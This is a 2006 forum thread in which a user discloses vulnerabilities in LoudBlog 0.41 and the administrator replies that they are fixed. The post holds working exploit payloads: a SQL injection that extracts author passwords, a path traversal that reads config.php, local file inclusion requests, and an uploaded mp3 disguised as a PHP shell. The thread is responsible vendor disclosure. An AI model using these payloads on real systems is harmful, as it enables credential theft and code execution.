LoudBlog - Podcasting-Software for PHP - Forum

You are not logged in.

Announcement

Unfortunatelly, we received lots of spam in the LoudBlog forum. We closed registrations so far. Please check again later.

Pages: 1

 

#1 Mar 7th 2006 09:49

kuze
Member

Several vulnerabilities in 0.41

SQL Injection in podcast.php (magic_quotes=off):
http://[target]/loudblog/podcast.php?id=1' and '1'='0' union select password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from lb_authors where '1'='1' /*

Read local files (index.php):
http://[target]/loudblog/index.php?template=../../../loudblog/custom/config.php%00

Local php file include (loudblog/inc/backend_settings.php):
POST /loudblog/loudblog/inc/backend_settings.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

language=../../../index


Local file include (upload a cmdphp.mp3 comment, include it, must have access to admin panel):
http://[target]/loudblog/loudblog/index.php?page=/../../../audio/cmdphp.mp3%00

Submitted to securityfocus today.

~kuze

Offline

 

#2 Mar 7th 2006 10:23

Gerrit
Administrator

Re: Several vulnerabilities in 0.41

Thank you very much. Fixed those on my Working copy. Will test this and immediately release a fixed version.

Offline

 

 

Pages: 1

Board footer

Powered by PunBB
© Copyright 2002–2005 Rickard Andersson